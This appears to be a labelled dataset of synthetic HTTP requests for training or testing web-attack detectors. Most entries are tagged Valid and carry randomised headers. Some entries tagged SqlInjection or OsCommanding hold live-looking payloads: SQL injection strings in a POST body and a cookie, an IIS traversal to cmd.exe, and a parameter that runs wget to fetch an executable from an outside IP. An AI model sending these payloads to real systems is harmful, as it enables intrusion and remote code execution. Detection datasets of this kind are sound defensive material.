If-Range: *
Max-Forwards: 3565
MIME-Version: 3.6
Pragma: ytnud='oigya'
Proxy-Authorization: Digest uri=http://www.hhett.st/Rk6cm2/mrAT.png
Authorization: Digest nonce
Range: -74002,17-59,16-
Referer: /miaeEsgo/dlMe1T/thcms7rf.gif
TE: trailers,chunked;q=0.7,trailers
Trailer: If-Unmodified-Since
User-Agent: nOhInptoil (lQhzX7C; ytcDp6D; gJOWLhn; wEVGn-TU; nAImz8d6PR)
UA-CPU: Sparc
UA-Disp: 6130,9479,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9463x953
Via: 0.0 44.194.99.251, HTTP/2.0 75.42.225.191:0, 8.8 91.32.67.247
Transfer-Encoding: tuah; rXt2d44e=4fOgnjcr
Upgrade: nAzm/6.2, yh8o/8.1
Warning: 284 243.236.131.97 "ecoowdcc2ipb" "Fri, 03 Apr 09 17:35:41 CET"
X-Forwarded-For: 44.108.222.96
X-Serial-Number: 442361
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9099
Start - Id: 22327
class: Valid
GET /oWHdPnE/dTZIt/4sK0tu42P34r@gAca-/asKf/h.9Wc-p5zXSCyvn.css?3oeeodtiee97nRc=iPwte%3D+dzseCaN&egfsn1nc8eswi=neLmnhtugnAn&ge5es8S=i2YTyK%40z&dhtiueolOez=729 HTTP/1.1
Host: www.a0retyec.de:80
Connection: 1irNecie
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.2
Cache-Control: max-stale=8
Client-ip: 205.205.233.59
Cookie: 0deoeHhett3te=yUZ@rRGLbx;Ooeeuwdtubsv=ewx eadaeao &6e;et6tEnfs=idh;ieni=zPoihrtebeaco;tcp=m
Cookie2: $Version="57"
Date: Sun, 29 Feb 04 23:07:32 CET
ETag: W/"EUjpsUHaRQVOa0OVIUF"
Expect: 100-continue
From: iHpsna2i@sBsaOrTep.ch
If-Modified-Since: Wed, 31 Aug 05 12:44:03 UTC
If-Unmodified-Since: Fri, 10 Apr 09 05:27:59 UTC
If-Match: "qnJmFbYaKMUNGyxw"
If-None-Match: "m-9pampWvP4ox2e"
If-Range: *
Max-Forwards: 8573
MIME-Version: 9.3
Pragma: vxcr=h
Proxy-Authorization: NTLM ZW1vdG9mb3BhanRydHB5b3Nkc2xldHJhaGVhdG5lYWRvY3NzaUVlQXJudGNiZmNm
Authorization: NTLM ZWlpZXJudHl4b2ZjdG5pdHMxb3VneGRkaU50eW4wZWRidW9zY3VjOHJhZWVj
Range: -086874,-834
Referer: http://www.Lh1s.st/snatvyA/zndr.shtml
TE: gzip;q=0.0
Trailer: Trailer
User-Agent: Mozilla/5.4 (Machintosh; U; PPC 4.3; 8e-5r; rv:4.0.2) Gecko/15632157
UA-CPU: StrongARM
UA-Disp: 6322,2576,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 254x8392
Via: 0.7 www.batzqLn1.htm:3, HTTP/3.2 www.Gwlrregt.jpg
Transfer-Encoding: deflate
Upgrade: eOhtM/9.6, icm/5.3, zas/4.8
Warning: 671 28.174.76.18 "cWdlqucSkne3oqeaa" "Tue, 12 Oct 04 20:29:33 CET"
X-Forwarded-For: 205.232.245.228
X-Serial-Number: 8809830
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22327
Start - Id: 12233
class: Valid
GET /a8ughlT/eq6s4ttshsr4mseO4ra/irSnaX@h-OiC/b4hx/8txnm/tsr90GuKig/eoh69761XB/gdseen9e8tlo/OUchildYfetc/oldrtfynZaounurrlitr/pgl8X.asp?eEisaashOeRsrb=lTCUHkOX&rtarears52=80&IKQmailiTF=crj HTTP/1.0
Host: 186.131.128.31:80
Connection: egsis
Accept: image/*, image/gif;q=0.7, audio/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 218.85.114.86
Cookie: ohBd=ra
Cookie2: $Version="3"
Date: Thu, 27 Mar 08 08:38:09 CET
ETag: "GrpqPH7QKMK6-iZdlT"
Expect: 100-continue
From: msaq@tanxaosh5.ch
If-Modified-Since: Mon, 08 Nov 04 06:21:59 GMT
If-Unmodified-Since: Sun, 29 Jul 07 20:03:15 GMT
If-Match: "aPW0.pmxIkhC5k7@a"
If-None-Match: "vyZly1b-ECvQW4jhvZ"
If-Range: Thu, 02 Jul 09 12:16:48 UTC
Max-Forwards: 68
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM bHNlZ25iZHNhcW5lSXJOZWFpc29lZWxuZ1J2ZmxhOWVyaA==
Authorization: zg5mxx utqggea=teztr
Range: -51713,07144-
Referer: /imjet/aeRidzt.wav
TE: trailers,gzip;q=0.4
Trailer: Expect
User-Agent: inAlu/8.8
UA-CPU: PowerPC
UA-Disp: 2190,4880,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 162x739
Via: HTTP/2.2 187.73.171.202, HTTP/8.7 www.ndei.gif, 5.2 www.efo2nps.html
Transfer-Encoding: compress
Upgrade: xnhun/4.7, foajfe/4.9, tiTnoe/9.3, sHsmu/7.7
Warning: 176 125.171.28.119 "rAswf" "Thu, 16 Oct 08 01:05:52 GMT"
X-Forwarded-For: 60.209.14.143
X-Serial-Number: 8899123917889
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12233
Start - Id: 4844
class: Valid
PUT /iqetqs0r/MyzLandhvar/FDEwtosteom/inlbesc/1J8/slnhchg.swf? HTTP/1.1
Content-Length: 146
Content-Language: ddnTdeu,poT
Content-Encoding: identity
Content-Location: http://www.etyh.org/impIreRh.avi
Content-MD5: eW5uaHJlU3Vvb21lcndlbw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Mar 10 07:43:59 CET
Last-Modified: Wed, 10 Jun 09 16:44:25 GMT
Host: www.guRnrEetiw.be
Connection: Lcmsa
Accept: */*;q=0.3
Accept-Charset: iso-2022-kr;q=0.8, x-mac-greek
Accept-Encoding: identity;q=0.5, compress, compress;q=0.3, deflate;q=0.4
Accept-Language: ira-nnAhHnm2, aniauh-riat0r8;q=0.7, edgtt-zea, iiG-5hth;q=0.9
Cache-Control: no-cache
Client-ip: 173.63.67.215
Cookie: ndsnnkApansSym=enepcsElli;yrwksneiRec=62;i9oeqdC=72989047
Cookie2: $Version="639"
Date: Wed, 02 Feb 05 06:41:18 GMT
ETag: "lUqoSzzB.@-hL@tfIz"
Expect: 100-continue
From: leaTmHa@pheie.net
If-Modified-Since: Mon, 29 Nov 04 22:38:32 GMT
If-Unmodified-Since: Sun, 02 Jan 05 10:12:08 CET
If-Match: *
If-None-Match: *
If-Range: "Z-7o_twU9O-0TexL.nax"
Max-Forwards: 11
MIME-Version: 8.6
Pragma: n=rh
Proxy-Authorization: naIcSN re1rfCoS=bpehrr
Authorization: Basic bTJyZ2hubzphY2lsNg==
Range: -2648,-1383,481-169
Referer: http://ontsyeed.be/meoen/jdcad.wmn
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.1 (X11; U; Open BSD i586 4.3; aa-vt; rv:2.8.6) Gecko/59101745
UA-CPU: StrongARM
UA-Disp: 092,446,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 812x666
Via: 9.8 www.elqoia.jpg:7
Transfer-Encoding: compress
Upgrade: blg/4.2
Warning: 023 191.251.175.83:94352 "ra7sp6lsitbtinme" "Sat, 03 Oct 09 15:33:52 UTC"
X-Forwarded-For: 191.124.85.186
X-Serial-Number: 408211072514512
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

EVt2=rVWDe5rF5OU1&iWbA=Xia3Zn&lo3RFoa6i=2096927&qr=225914&Io3is=sZwRfrq&ejdGaekha=930984&ttgisa=389432478&6eer68n4haKOdh=3614731338&crAulebcot=mi.

End - Id: 4844
Start - Id: 13673
class: Valid
GET /Zh16Y/wod41etddtstnpnme/s-VXWMs3UM0/meE/idDyUCGC0JVyQ1S/x4bMH/oVderievieiP/tMygp1vxCd6tid.ex/Kmmee0saCtCen/iiznbrD1Ybqos/drCBsk_9ev_Eoz7N/aYP-jZQO9DC.html?detpldpndeuaK=il0egrem&xtloTofb=20582&helq1Tant=neoetedew%2F%40f%3A&yhr=uliofleefhmi832&tphlaaOnUt=nu+L%40%40db4psock_stream-&3G1NZE=Er65e%26exaabeR&jobe=yezuwna&dose7hfcee=Rba%3F0q&GiBq4e.=eq48D&ilmo5ix=dqZ&thieaeocipuk=cv%3FeNr&3krlcTlcd67=tTeiahx7h2n2&Ttptsatckzs=m HTTP/1.0
Host: www.ziihacaYo.uk:7
Connection: close
Accept: video/*;q=0.9
Accept-Charset: windows-1254, x-mac-greek
Accept-Encoding: identity, compress, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 210.22.234.141
Cookie: lsiwntazho6=9383156;elan=tp4c9FhT;hwoergnihgnNrh=5 stR
Cookie2: $Version="68"
Date: Fri, 18 Nov 05 07:23:49 GMT
ETag: W/"35rHYue0kljfB2UOo"
Expect: eantnc
From: cstRurd@tior.com
If-Modified-Since: Thu, 13 Mar 08 10:21:06 GMT
If-Unmodified-Since: Fri, 28 Jan 05 12:02:47 CET
If-Match: *
If-None-Match: "CfAfJfnnIjcguN_gdu"
If-Range: *
Max-Forwards: 3
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM YXBlZXJuNmVydGVocmVpbTlnbmVrYXI3b2l5ZW50dGl0cG5sb2U1dGdjNA==
Range: 7-8,-418041
Referer: http://www.skbietb.fr/soe05je/xdnd/NeyuuA7s/opest.gif
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/1.0 (Windows; U; WinNT 2.0; me-eX; rv:9.8.1) Gecko/12347641
UA-CPU: PowerPC
UA-Disp: 0718,4997,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 947x489
Via: HTTP/6.3 www.2hee.jpg, FTP/3.4 www.ieiA.jpg
Transfer-Encoding: s6adrr; r8yo9hsa=oe9sa7mR
Upgrade: ofeeai/0.6, eer/0.4
Warning: 810 233.40.240.2:75910 "hppilonufanrr5o" "Tue, 05 Oct 04 06:33:59 UTC"
X-Forwarded-For: 145.31.187.12
X-Serial-Number: 02500062912801761
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13673
Start - Id: 41518
class: SqlInjection
POST /PMgr-p6EYZ-uu/t5T_nzy7RIQdkhS/r8pnihahlrsCgottsh/RbitIgJ4RYO4B/leCsqE9W47pP/D9xcS@0zvfb/m.gX2196kH/KdRid4Dnode8lYVR/i0_Q/tb/fxeJ8_Xsu/ur.mdb? HTTP/1.0
Content-Length: 174
Content-Language: on5tagh,3oel,3a
Content-Encoding: identity
Content-Location: http://dosB.fr/eiya/iyjN/otmkmra/ri8lh/3ankM1u.mpeg
Content-MD5: aGVoc2lDMGx5cXRlaWFPZg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Jul 09 01:36:50 CET
Last-Modified: Sat, 06 Oct 07 08:27:00 UTC
Host: 137.35.215.3:921
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: f-aqii
Cache-Control: max-age=207
Client-ip: 78.241.99.85
Cookie: zoel=mlUk7jiNIu;ehs=wen9flthtr)ra
Cookie2: $Version="16"
Date: Fri, 11 May 07 04:07:01 GMT
ETag: "_vMH@4MNLWv9FY-"
Expect: maEbbf
From: tdvdi@oee6.st
If-Modified-Since: Sat, 25 Apr 09 21:17:02 GMT
If-Unmodified-Since: Mon, 28 Jan 08 03:49:15 GMT
If-Match: "vVn@nhdmuA2X9zNAGy0f"
If-None-Match: "zhQtOCN1clAtH_d4pSbU"
If-Range: *
Max-Forwards: 3535
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic ZkkyNTpucm9z
Authorization: war8dc vont=sei1
Range: -68
Referer: /08q7neh/EiNdtHvT.htm
TE: trailers,gzip;q=0.7,deflate;q=0.2
Trailer: User-Agent
User-Agent: hiohejeou/4.1.9
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: 3.2 www.fld4mu7.jpg, 8.9 www.3uOaie.jpeg, 1.0 87.47.0.33:2
Transfer-Encoding: iebnb
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wlaeaaonlanohx=8722&Hd=EwmsEd=no[la&_itMR-Mmhw=tlo8ohOZfawnou&wysinleeactrmE=6&de3Steamh2=qwer'    or  ng0h6e_v.Account='nwisragl@rdpbre.com&ou9sndOeieha=04bw8epC

End - Id: 41518
Start - Id: 31565
class: Valid
GET /ss6e/yaRh4netXucnnui1ecst/l9ismyTq/aw/a0pVL_cQq4oKU/s0F@wFM1h/vZ4F5/l@MBRC16Ny-zeClKjg-.mspx?iajnarysmebiimc=87494493&moe=R8i&cdclrCeildl=ole4e&xGmH=644972646&neycmsegp=6e%7Etiae1%3Eom HTTP/1.1
Host: www.AzrseT5w.fr:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 201.238.6.219
Cookie: trwnn03=Aldlle>st;hCQ-O_2YfR=5992260865
Cookie2: $Version="072"
Date: Fri, 05 Feb 10 03:12:13 UTC
ETag: "SieCCYSjLMMQo1sQ"
Expect: gTTDn
From: iaar@tt4tqltp.org
If-Modified-Since: Wed, 28 Oct 09 13:28:13 GMT
If-Unmodified-Since: Wed, 13 Jun 07 13:07:36 GMT
If-Match: "tdsBe17qCHBmIUOODV"
If-None-Match: "y_5lcgoa3vGceshM"
If-Range: ".0ZtQS-vwsl2cggyfSNN"
Max-Forwards: 7705
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest uri=/xtnll9t/nhneg.jpg
Range: -40023,010285-,775998-
Referer: /naDA/m8a8eme.wav
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: rogtlia (4K6mNH; tKsdx5Ijuq; eUnhIWl)
UA-CPU: Sparc
UA-Disp: 7964,455,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 951x498
Via: 2.8 www.axswirq.htm
Transfer-Encoding: gzip
Upgrade: epi/8.9, P0i/3.1, tdsea/1.4
Warning: 706 219.37.111.64 "5rhSqrlrse8tacoit" 
X-Forwarded-For: 190.159.59.68
X-Serial-Number: 7616561595248452
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31565
Start - Id: 7291
class: Valid
PUT /mkPHBw7nc/rtshe/3ORM8.g.RIU/Srniia/tgsgoae7cwoeheoeuhsq/elmE/uHMESjNte80CKZN8AmQa/mitoowsuplt/uxnwxRfwQCUL.lfj/t4X8HrAmNO/zrNaarResadarPOL/hQe1_pcahtaccesB8.jpg? HTTP/1.0
Content-Length: 128
Content-Language: r0n,Eiuhe,b
Content-Encoding: deflate
Content-Location: http://www.wymares.com/3temsx/eriocer/zCmaee/tuzitwt/atob.sh
Content-MD5: N21lSXNMb2hkZnQzcjU4NQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Dec 04 01:19:15 CET
Last-Modified: Tue, 20 Nov 07 08:26:00 CET
Host: www.12Errr.de:88502
Connection: keep-alive
Accept: audio/basic;q=0.5, audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: e-sw3etln;q=0.5, UOlNi-socv, cnieoip-aang;q=0.6, gi7a-hxbhenpS
Cache-Control: max-age=99515
Client-ip: 58.170.210.194
Cookie: 97ehn2Ah=e6ecy1nvpoha
Cookie2: $Version="92"
Date: Tue, 18 Aug 09 15:56:16 CET
ETag: W/"EXmkg622urjmA32"
Expect: eOomxsnh=fautnd;TnFoe
From: unwtaXtu@IqrpdtE.de
If-Modified-Since: Wed, 11 Feb 04 05:43:26 UTC
If-Unmodified-Since: Wed, 26 Aug 09 03:13:03 CET
If-Match: "VTMxj872YK0mw7QGq_Rc"
If-None-Match: *
If-Range: *
Max-Forwards: 509
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic ZmVlaWU2Yjo0dGxy
Authorization: NTLM d2llbW9hckFpZW9iZ3JpOG9vbnVhZW9vdG15bGV0OWd0
Range: -226356
Referer: http://eEieig.st/laiTOhd.mpg
TE: trailers,chunked;q=0.7
Trailer: Connection
User-Agent: teae/1.2.4.9.2
UA-CPU: 68000
UA-Disp: 6402,121,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1302x7380
Via: 0.8 www.4tpt.js, HTTP/3.7 www.t5hk.jpeg:35, 5.0 119.156.197.63
Transfer-Encoding: ohjto
Upgrade: at1unn/1.6, Eep/3.6
Warning: 751 www.posuze.htm "EnsetciaOAAeiEuha" 
X-Forwarded-For: 145.201.167.246
X-Serial-Number: 35067124458
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~

iJnatrcce=>&nwyEra0zk2yan=5&eln9acbnmen=oh&ei3ewGalhlhctt=ay@xp_cn&peahts2tf=27252&8OU4FC=igpbBFe&pOXUorcptDBULl=77&eo=26474

End - Id: 7291
Start - Id: 44509
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 153.105.159.16
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: compress;q=0.8
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 200.92.139.197
Cookie: oA6l2zdhopon=433991;stdinJOTmhv6j=2$;ei1onAnsiSnletl=7e2Nscript+dyud9c:ta
Cookie2: $Version="123"
Date: Mon, 20 Nov 06 01:25:21 CET
ETag: W/"HcdXasxzouezv38hXg"
Expect: auaEbj2f=ti3z24oz
From: aOaort0e@ftfehuiid.cz
If-Modified-Since: Mon, 04 May 09 20:29:35 UTC
If-Unmodified-Since: Sun, 11 Jan 04 21:19:15 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 61
MIME-Version: 8.2
Pragma: 6S79ho=egaepie
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: NTLM RlBFdGF0dDRhYXd6dHYwdW9zZWVjcjdhbjhvbjRhemJuOHVrcWVlUmw=
Range: 02051-7,-37253,903-654
Referer: http://www.taSinAy.biz/nnt3eee/c2puysbj/ohnatas/0lr603/aaslr.gz
TE: gzip;q=0.6
Trailer: Via
User-Agent: ebsi6m7qtaivkiea
UA-CPU: PowerPC
UA-Disp: 715,347,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 455x841
Via: HTTP/8.2 189.183.226.152, HTTP/8.6 70.24.243.218, HTTP/9.7 www.edntn.gif
Transfer-Encoding: identity
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44509
Start - Id: 41270
class: SqlInjection
GET /hQrS5frsnTna8eeri/hGRVi41DZbdAMFqFG/1nsamc27eV4andnHK-T/ibyElx0eodrgeieaumsr/IcopyiSYDVbTER.G/tIcYpUzw2e.tiff?qee6srate=s.qsz7q.d&eertta4jTeeh=a3rmmG&atmaee1tul=sD_F&et=qloeedaedunUao HTTP/1.0
Host: 214.118.54.174
Connection: close
Accept: image/*;q=0.0, text/*;q=0.8, image/png;q=0.0
Accept-Charset: windows-1250;q=0.3, cp-932;q=0.4, x-mac-chinesesimp;q=0.0, iso-8859-8
Accept-Encoding: *;q=0.1
Accept-Language: eh5eb-Ca75qg8s, hidi-a, o-oota, eMx-l5fesq;q=0.5, efe-rood4gsf;q=0.0
Cache-Control: max-stale
Client-ip: 30.18.100.135
Cookie: 1naemhniljor=')  UN/**/ION    ALL    SEL/**/ECT 'gResi2e',3,69712,'isrz1e',9   FROM l1dHlfo   WHERE    (''  ='
Cookie2: $Version="55"
Date: Sun, 11 Sep 05 17:33:46 UTC
ETag: "pCYU29GDlI7gE66qA"
Expect: zoNom=ioeao;yrM7e
From: secaxaii@ljoAtaiiwf.de
If-Modified-Since: Sun, 01 Nov 09 16:08:43 GMT
If-Unmodified-Since: Fri, 08 Aug 08 06:36:45 CET
If-Match: "Qwcam7u.bRggVSiZdr"
If-None-Match: "2@Ndthmz08Ubr115K"
If-Range: "o1rbqH6OZs@6JGfm5"
Max-Forwards: 294
MIME-Version: 2.4
Pragma: 7s=h5lecu
Proxy-Authorization: Digest cnonce="4dmgm"
Authorization: NTLM RXd3MmNlY2l1VHVlYWVoZ2VpbGJpZHRxTENxdGhmd3R4bg==
Range: -78675,-73,41-
Referer: http://lmt3.org/Tnaamtel/des5r/3IeiLone/ni7ttt.gif
TE: trailers
Trailer: Expect
User-Agent: Mozilla/6.4 (Windows; U; WinNT 2.7; oo-gu; rv:9.9.7) Gecko/91310855
UA-Disp: 189,7567,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 557x1445
Via: 4.0 www.Tyohlo.shtml, 3.4 www.jttnxtpv.html:9375
Transfer-Encoding: deflate
Upgrade: oialw/6.4, ecoFh/5.7, 2gE/1.6, fusedj/1.9, mxspi/7.0
Warning: 292 236.224.211.136 "whsgbaeh2iSTibeIwt" "Tue, 02 Sep 08 21:32:22 GMT"
X-Forwarded-For: 31.90.227.178
X-Serial-Number: 2028120
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41270
Start - Id: 33119
class: Valid
POST /zG4nLyCgsV8h8z8EnY/RhiAe/tluxNEc.ldjDmigqV0Zl/rlwsqldIpje7od/awPninedlmsD6ag.php3? HTTP/1.1
Content-Length: 313
Content-Language: eoTasedj,nu,Esu
Content-Encoding: compress
Content-Location: http://www.EbcE6fne.gov/jnmrY/tbtosn.js
Content-MD5: ZWRvenNldGUzYUF0Z25lYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Jun 09 09:37:47 CET
Last-Modified: Sun, 26 Oct 08 11:47:11 GMT
Host: 212.179.27.80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 230.124.221.154
Cookie: moaocyoaesrk=Beescript1g9neo2rni;em95NcemMuEnra=2056367;efaanToegOm5gi=2;irkskye=93
Cookie2: $Version="5"
Date: Wed, 16 Dec 09 18:00:51 GMT
ETag: "bhAOVzwMx7e_s2da"
Expect: lopnwT0=ei8deh
From: ryupoa@thaex.ch
If-Modified-Since: Sat, 09 Oct 04 06:40:33 GMT
If-Unmodified-Since: Sat, 13 Jan 07 09:48:12 GMT
If-Match: *
If-None-Match: "FyT-zhBipSR-cn7X_DG"
If-Range: *
Max-Forwards: 165
MIME-Version: 2.0
Pragma: 3esdbw='gaeawe'
Proxy-Authorization: Basic N3RhN3JuOnVkbW5zZA==
Authorization: NTLM M2NhdWFubmVyTkV0aGdpbm8wb3NlZ3Z5ZGFldGl3OFRlZ2RvNWFlbGViM2FlenRl
Range: 449-,116954-
Referer: http://www.gaerumk.com/aHecue/cGg8/igihilfn.exe
TE: chunked;q=0.9,trailers
Trailer: User-Agent
User-Agent: Mozilla/5.1 (Machintosh; U; PPC 6.8; 1c-86; rv:0.0.0) Gecko/64470920
UA-CPU: PowerPC
UA-Disp: 532,654,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 6581x441
Via: 1.4 69.58.179.96, 2.8 www.mtcigthN.jpeg, 2.4 132.212.18.61
Transfer-Encoding: gzip
Upgrade: dto/7.0
Warning: 956 www.r68u.htm:49944 "evd84o8ca9e" "Thu, 15 Dec 05 04:21:49 CET"
X-Forwarded-For: 221.12.252.224
X-Serial-Number: 0421946796861302632
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

diuEuett=7127786817&fH7P4tmpTrcpmLc4=e&q5child-=divin8%29a&1iRnt=nrsE%406A&Fs7meEbnrf=%5Dr&gu=l%27Lofi0nc%2F6echoirO-at+&Koz8U=4819835370&tnnayhrs6niI=neY3cakiahn3mntm0h&HZP8Meinsert%ul=afkk4o&4beImPi=9989051&EoXa=hp5s68Jk%40I&etaeeeri=lbhs74BclBeraE&7a8aehezoa3irr=ydgo&3CzYd=taJNnTBU%401g&DIb9sjvKImidiv=e%27niy

End - Id: 33119
Start - Id: 43327
class: OsCommanding
GET /vJopFhdgd/sT60YEnN/iocuisaiflnRint9e.sh?PYincludephVF4=6996567309&orolrHadytTsf=%5Cn+wget+++++http%3A%2F%2F49.25.185.130%3A457%2Fnftp.exe&ahcskeluL4=sm.gce3%40t9&ahroeaycns=r404Fh&nng7engeyb2=6urieicds&tngrexYcd8RR6ao=amailmapenteota47n&inewnpelsfemfte=eqQu&ye2seihae2mE=3663&GUPZ1damZT=eniEyhowie HTTP/1.1
Host: www.ksirpsjy.org
Connection: keep-alive
Accept: application/zip, text/plain;q=0.7, text/plain
Accept-Charset: koi8-r;q=0.1, x-mac-turkish;q=0.3, x-mac-japanese, windows-1250, euc-jp;q=0.5
Accept-Encoding: *
Accept-Language: icj-dtfpltpt, La1iq-d4ao;q=0.1, eenoy-s, tPAeau-p, s-s4Sns;q=0.8
Cache-Control: se0hida=no0k
Client-ip: 86.69.183.54
Cookie: at=42;wxleisgg1wuet=5;s9ttefah=74;mtmIC=aR90xwcovsLa9r
Cookie2: $Version="3"
Date: Sun, 30 Apr 06 16:41:02 GMT
ETag: W/"ojjDGkBlW@FU8f9_"
Expect: 100-continue
From: eTnr@war0.be
If-Modified-Since: Mon, 27 Jul 09 09:40:48 CET
If-Unmodified-Since: Tue, 02 Dec 08 22:59:24 GMT
If-Match: "i6TkusYWAoxyKXQgsf"
If-None-Match: *
If-Range: Thu, 29 Apr 10 20:00:33 GMT
Max-Forwards: 87
MIME-Version: 3.7
Pragma: 0s31wts='yap'
Proxy-Authorization: NTLM aXlCUG5Zbm5ybXJ0aUZ6dG85SXdlaGVmZ2ZkaXVhZ2Rkdnlpb25saGJL
Authorization: otoo itqu6=kdmai
Range: -3
Referer: /kzadg0er/cphotIcI/edmnMhh.wmn
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: n4uosl (85dXKY; aD24di; ssCKA5y1; e2.axeuT5)
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: FTP/9.5 www.aoiIei8A.shtml, 2.9 www.C5tvpm.js, FTP/1.2 156.245.175.107
Transfer-Encoding: deflate
Upgrade: s6hdl/7.5, 6rdns/6.0, wt2/7.2, trtfwt/0.2, z5mi/7.4
Warning: 701 130.228.213.242 "weeAeeiqooatnpcr" "Sat, 22 Oct 05 10:49:54 UTC"
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 356926769417178111
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43327
Start - Id: 4286
class: Valid
PUT /cseoLwolsrrtnss2th.htm? HTTP/1.0
Content-Length: 59
Content-Language: mo,oeoe9ok
Content-Encoding: gzip
Content-Location: /6lojeca4/otem/eMniW/sdOepvs/hjtTeQ4h.pdf
Content-MD5: Y3N2ZUJ1RGVyRWVsNWlzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Mar 09 08:54:49 CET
Last-Modified: Sat, 07 Apr 07 14:57:39 CET
Host: www.gACyaw.de:0
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: v-dkyod, ti9-ti;q=0.5
Cache-Control: no-store
Client-ip: 214.181.125.246
Cookie: wlK=u;elAlwh=tan
Cookie2: $Version="95"
Date: Wed, 24 Jan 07 03:05:47 GMT
ETag: "Uv7Qocx@cE_rEtGAi5ZY"
Expect: 100-continue
From: d4tmdhbi@dApmaveH.gov
If-Modified-Since: Tue, 13 Dec 05 04:10:28 UTC
If-Unmodified-Since: Sun, 24 Jul 05 18:11:25 CET
If-Match: "w4si0tliVRcGnXUX"
If-None-Match: "ZLJxYMkv6HG5MHaPP-a"
If-Range: Wed, 30 Apr 08 15:32:17 GMT
Max-Forwards: 554
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest response="Ccd5eeD66f5934ac43CC47AD7e7eE496"
Authorization: Digest username="Odtta4eo"
Range: 557-
Referer: http://e4cptcH.net/BpaIh/uerl5w/nypa/mdeS/la4Iae6.jsp
TE: gzip;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.6 (Windows; U; Win98 2.6; eL-oo; rv:4.2.0) Gecko/32487904
UA-CPU: StrongARM
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 536x588
Via: 8.4 12.125.67.151:2, FTP/9.2 www.ESrs4.gif:751
Transfer-Encoding: gzip
Upgrade: Unh/4.4
Warning: 787 www.taikmdp.html:2894 "o4xcDruec" 
X-Forwarded-For: 49.153.10.138
X-Serial-Number: 41906
